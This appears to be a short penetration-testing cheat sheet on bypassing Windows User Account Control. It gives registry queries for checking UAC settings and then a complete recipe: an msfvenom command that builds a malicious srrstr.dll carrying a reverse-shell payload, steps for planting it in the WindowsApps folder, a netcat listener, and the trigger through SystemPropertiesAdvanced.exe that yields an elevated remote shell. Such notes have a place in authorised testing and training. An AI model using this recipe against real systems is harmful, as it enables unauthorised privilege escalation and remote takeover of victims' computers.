UAC bypasses leverage flaws or unintended functionality in different Windows builds.
The following repository contains many different UAC Bypassing Techniques: https://github.com/hfiref0x/UACME
Check if UAC is enabled (0x1=true): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Check the UAC level(0x5=max level): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
To check the Windows Build: [environment]::OSVersion.Version
Check this repository and see if anything exists for the target build number
- We can basically bypass UAC by placing a malicious
srrstr.dllDLL to theWindowsAppsfolder, which will be loaded in an elevated context - Generate malicious DLL file:
msfvenom -p windows/shell_reverse_tcp LHOST=our-ip LPORT=listening-port -f dll > srrstr.dll - Transfer the DLL on the target machine
- Start a netcat listener on the attacker machine:
nc -lvnp 4444 - Get a reverse shell:
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe